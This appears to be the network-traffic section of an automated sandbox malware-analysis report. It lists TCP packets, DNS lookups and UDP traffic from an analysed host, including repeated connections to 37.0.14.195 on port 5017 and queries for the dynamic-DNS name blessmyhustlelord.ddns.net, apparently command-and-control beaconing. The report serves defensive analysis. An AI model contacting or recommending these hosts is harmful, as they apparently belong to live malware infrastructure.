                                Jun 26, 2022 09:43:17.379072905 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.379086971 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.379112959 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.379143953 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.379153967 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.379199028 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.379204035 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.379215002 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.379246950 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.379276037 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.379287004 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.379334927 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.379344940 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.379385948 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.379395962 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.379410982 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.379456043 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.379467010 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.379497051 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.379508972 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.395275116 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.395355940 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.395371914 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.395401001 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.395433903 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.395436049 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.395453930 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.395464897 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.395492077 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.395504951 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.395523071 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.395534992 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.395566940 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.395589113 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.395775080 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.395833969 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.395886898 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.395941973 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.395967007 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.395978928 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.395992994 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.396028042 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.396056890 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.396116018 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.396120071 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.396135092 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.396173000 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.412720919 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.412794113 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.412813902 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.412846088 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.412867069 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.412879944 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.412894964 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.412906885 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.412930012 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.412946939 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.412962914 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.412971973 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.413002014 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.413008928 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.413034916 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.413044930 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.413070917 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.413083076 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.413105011 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.413114071 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.413132906 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.413145065 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.413162947 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.413172960 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.413196087 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.413224936 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.413490057 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.413548946 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.413556099 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.413569927 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.413599014 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.413614035 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.413620949 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.413631916 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.413672924 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.413676977 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.413688898 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.413717031 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.413734913 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.413769007 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.413821936 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.413829088 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.413842916 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.413885117 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.413897991 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.413949013 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.413975000 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.414028883 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.414032936 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.414051056 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.414079905 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.414108038 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.415024042 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.415090084 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.415117979 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.415138960 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.415155888 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.415169954 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.415186882 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.415198088 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.415220976 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.415237904 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.415246964 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.415256977 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.415283918 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.415297031 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.415312052 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.415321112 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.415348053 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.415355921 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.415379047 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.415389061 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.415415049 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.415443897 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.430968046 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.431045055 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.431070089 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.431097031 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.431133986 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.431140900 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.431148052 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.431158066 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.431190968 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.431221962 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.431230068 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.431241989 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.431269884 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.431281090 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.431303978 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.431313992 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.431330919 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.431339979 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.431382895 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.431386948 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.431397915 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.431442022 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.431456089 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.431504011 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.431510925 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.431521893 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.431545019 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.431566954 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.431595087 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.431603909 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.431622982 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.431653023 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.431663990 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.431710958 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.431740999 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.431818962 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.431837082 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.431909084 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.431922913 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.432008028 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.432224989 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.432245970 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.432285070 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.432317019 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.432334900 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.432359934 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:17.432369947 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.432396889 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.432430029 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:17.618706942 CEST497495017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:17.787256956 CEST50174974937.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:21.646601915 CEST497545017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:21.814785004 CEST50174975437.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:22.319164991 CEST497545017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:22.484839916 CEST50174975437.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:23.019167900 CEST497545017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:23.183585882 CEST49751443192.168.2.3162.159.134.233
                                Jun 26, 2022 09:43:23.183621883 CEST44349751162.159.134.233192.168.2.3
                                Jun 26, 2022 09:43:23.186806917 CEST50174975437.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:24.253930092 CEST497635017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:24.431509972 CEST50174976337.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:25.067270994 CEST497635017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:25.243153095 CEST50174976337.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:25.768349886 CEST497635017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:25.943362951 CEST50174976337.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:27.034014940 CEST497665017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:27.222095966 CEST50174976637.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:27.772732973 CEST497665017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:27.953236103 CEST50174976637.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:28.566605091 CEST497665017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:28.742435932 CEST50174976637.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:29.778542042 CEST497675017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:29.951870918 CEST50174976737.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:30.519800901 CEST497675017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:30.710325003 CEST50174976737.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:31.220448971 CEST497675017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:31.389960051 CEST50174976737.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:32.434205055 CEST497685017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:32.599925995 CEST50174976837.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:33.126908064 CEST497685017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:33.291924953 CEST50174976837.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:33.830120087 CEST497685017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:33.998059034 CEST50174976837.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:35.060447931 CEST497695017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:35.237716913 CEST50174976937.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:35.767699957 CEST497695017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:35.950320005 CEST50174976937.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:36.477570057 CEST497695017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:36.641459942 CEST50174976937.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:38.480386972 CEST497705017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:38.660038948 CEST50174977037.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:39.174254894 CEST497705017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:39.357315063 CEST50174977037.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:39.861820936 CEST497705017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:40.040954113 CEST50174977037.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:41.148549080 CEST497715017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:41.324491978 CEST50174977137.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:41.830785036 CEST497715017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:42.029798031 CEST50174977137.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:42.533925056 CEST497715017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:42.714704037 CEST50174977137.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:43.748924971 CEST497725017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:43.933401108 CEST50174977237.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:44.440331936 CEST497725017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:44.615160942 CEST50174977237.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:45.127975941 CEST497725017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:45.292519093 CEST50174977237.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:46.330517054 CEST497735017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:46.506122112 CEST50174977337.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:47.018630981 CEST497735017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:47.211365938 CEST50174977337.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:47.721868038 CEST497735017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:47.896836996 CEST50174977337.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:48.942389011 CEST497745017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:49.147073030 CEST50174977437.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:49.659554005 CEST497745017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:49.879177094 CEST50174977437.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:50.393940926 CEST497745017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:50.579958916 CEST50174977437.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:51.631499052 CEST497755017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:51.808821917 CEST50174977537.0.14.195192.168.2.3
                                Jun 26, 2022 09:43:52.324282885 CEST497755017192.168.2.337.0.14.195
                                Jun 26, 2022 09:43:58.332247972 CEST497755017192.168.2.337.0.14.195
                                Jun 26, 2022 09:44:11.480900049 CEST497785017192.168.2.337.0.14.195
                                Jun 26, 2022 09:44:11.695023060 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:11.695127964 CEST497785017192.168.2.337.0.14.195
                                Jun 26, 2022 09:44:11.704756975 CEST497785017192.168.2.337.0.14.195
                                Jun 26, 2022 09:44:11.955065012 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:12.560986042 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:12.564519882 CEST497785017192.168.2.337.0.14.195
                                Jun 26, 2022 09:44:12.785697937 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:17.574660063 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:17.633054018 CEST497785017192.168.2.337.0.14.195
                                Jun 26, 2022 09:44:17.875022888 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:22.595350027 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:22.599138975 CEST497785017192.168.2.337.0.14.195
                                Jun 26, 2022 09:44:23.052977085 CEST497785017192.168.2.337.0.14.195
                                Jun 26, 2022 09:44:23.059103012 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:23.059206963 CEST497785017192.168.2.337.0.14.195
                                Jun 26, 2022 09:44:23.273741007 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:27.586859941 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:27.605143070 CEST497785017192.168.2.337.0.14.195
                                Jun 26, 2022 09:44:27.854959011 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:32.606898069 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:32.609205961 CEST497785017192.168.2.337.0.14.195
                                Jun 26, 2022 09:44:32.827030897 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:37.602889061 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:37.607839108 CEST497785017192.168.2.337.0.14.195
                                Jun 26, 2022 09:44:37.921314001 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:42.622436047 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:42.625078917 CEST497785017192.168.2.337.0.14.195
                                Jun 26, 2022 09:44:42.855470896 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:47.626965046 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:47.770333052 CEST497785017192.168.2.337.0.14.195
                                Jun 26, 2022 09:44:48.010862112 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:52.655294895 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:52.656127930 CEST497785017192.168.2.337.0.14.195
                                Jun 26, 2022 09:44:52.975090027 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:57.648576975 CEST50174977837.0.14.195192.168.2.3
                                Jun 26, 2022 09:44:57.649153948 CEST497785017192.168.2.337.0.14.195
                                Jun 26, 2022 09:44:57.879748106 CEST50174977837.0.14.195192.168.2.3

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Jun 26, 2022 09:42:47.586988926 CEST5592353192.168.2.38.8.8.8
                                Jun 26, 2022 09:42:47.607784033 CEST53559238.8.8.8192.168.2.3
                                Jun 26, 2022 09:43:08.861673117 CEST5772353192.168.2.38.8.8.8
                                Jun 26, 2022 09:43:08.881994963 CEST53577238.8.8.8192.168.2.3
                                Jun 26, 2022 09:43:10.750699997 CEST5811653192.168.2.38.8.8.8
                                Jun 26, 2022 09:43:10.774064064 CEST53581168.8.8.8192.168.2.3
                                Jun 26, 2022 09:43:13.523336887 CEST5742153192.168.2.38.8.8.8
                                Jun 26, 2022 09:43:13.544734001 CEST53574218.8.8.8192.168.2.3
                                Jun 26, 2022 09:43:16.191664934 CEST6535853192.168.2.38.8.8.8
                                Jun 26, 2022 09:43:16.214441061 CEST53653588.8.8.8192.168.2.3
                                Jun 26, 2022 09:43:17.117027998 CEST4987353192.168.2.38.8.8.8
                                Jun 26, 2022 09:43:17.139172077 CEST53498738.8.8.8192.168.2.3
                                Jun 26, 2022 09:43:21.610383034 CEST6333253192.168.2.38.8.8.8
                                Jun 26, 2022 09:43:21.631690025 CEST53633328.8.8.8192.168.2.3
                                Jun 26, 2022 09:43:24.196943998 CEST4932753192.168.2.38.8.8.8
                                Jun 26, 2022 09:43:24.216413021 CEST53493278.8.8.8192.168.2.3
                                Jun 26, 2022 09:43:26.996424913 CEST5898153192.168.2.38.8.8.8
                                Jun 26, 2022 09:43:27.015767097 CEST53589818.8.8.8192.168.2.3
                                Jun 26, 2022 09:43:29.759982109 CEST6445253192.168.2.38.8.8.8
                                Jun 26, 2022 09:43:29.777625084 CEST53644528.8.8.8192.168.2.3
                                Jun 26, 2022 09:43:32.412154913 CEST6138053192.168.2.38.8.8.8
                                Jun 26, 2022 09:43:32.433199883 CEST53613808.8.8.8192.168.2.3
                                Jun 26, 2022 09:43:35.037820101 CEST6314653192.168.2.38.8.8.8
                                Jun 26, 2022 09:43:35.058957100 CEST53631468.8.8.8192.168.2.3
                                Jun 26, 2022 09:43:38.386646032 CEST5298553192.168.2.38.8.8.8
                                Jun 26, 2022 09:43:38.407360077 CEST53529858.8.8.8192.168.2.3
                                Jun 26, 2022 09:43:41.126136065 CEST5862553192.168.2.38.8.8.8
                                Jun 26, 2022 09:43:41.147382021 CEST53586258.8.8.8192.168.2.3
                                Jun 26, 2022 09:43:43.728009939 CEST5281053192.168.2.38.8.8.8
                                Jun 26, 2022 09:43:43.747239113 CEST53528108.8.8.8192.168.2.3
                                Jun 26, 2022 09:43:46.310242891 CEST5077853192.168.2.38.8.8.8
                                Jun 26, 2022 09:43:46.329695940 CEST53507788.8.8.8192.168.2.3
                                Jun 26, 2022 09:43:48.924099922 CEST5515153192.168.2.38.8.8.8
                                Jun 26, 2022 09:43:48.941359043 CEST53551518.8.8.8192.168.2.3
                                Jun 26, 2022 09:43:51.607608080 CEST5979553192.168.2.38.8.8.8
                                Jun 26, 2022 09:43:51.630036116 CEST53597958.8.8.8192.168.2.3
                                Jun 26, 2022 09:44:11.454999924 CEST6481653192.168.2.38.8.8.8
                                Jun 26, 2022 09:44:11.476694107 CEST53648168.8.8.8192.168.2.3

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                Jun 26, 2022 09:42:47.586988926 CEST192.168.2.38.8.8.80xf2b2Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:08.861673117 CEST192.168.2.38.8.8.80x4a2cStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:10.750699997 CEST192.168.2.38.8.8.80xf7d7Standard query (0)blessmyhustlelord.ddns.netA (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:13.523336887 CEST192.168.2.38.8.8.80x88e8Standard query (0)blessmyhustlelord.ddns.netA (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:16.191664934 CEST192.168.2.38.8.8.80xbbc8Standard query (0)blessmyhustlelord.ddns.netA (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:17.117027998 CEST192.168.2.38.8.8.80xca4cStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:21.610383034 CEST192.168.2.38.8.8.80xbd6aStandard query (0)blessmyhustlelord.ddns.netA (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:24.196943998 CEST192.168.2.38.8.8.80xcaa3Standard query (0)blessmyhustlelord.ddns.netA (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:26.996424913 CEST192.168.2.38.8.8.80xf5b4Standard query (0)blessmyhustlelord.ddns.netA (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:29.759982109 CEST192.168.2.38.8.8.80x2abaStandard query (0)blessmyhustlelord.ddns.netA (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:32.412154913 CEST192.168.2.38.8.8.80xf76aStandard query (0)blessmyhustlelord.ddns.netA (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:35.037820101 CEST192.168.2.38.8.8.80x1bd7Standard query (0)blessmyhustlelord.ddns.netA (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:38.386646032 CEST192.168.2.38.8.8.80xfeccStandard query (0)blessmyhustlelord.ddns.netA (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:41.126136065 CEST192.168.2.38.8.8.80x7b86Standard query (0)blessmyhustlelord.ddns.netA (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:43.728009939 CEST192.168.2.38.8.8.80x3b18Standard query (0)blessmyhustlelord.ddns.netA (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:46.310242891 CEST192.168.2.38.8.8.80x1b19Standard query (0)blessmyhustlelord.ddns.netA (IP address)IN (0x0001)
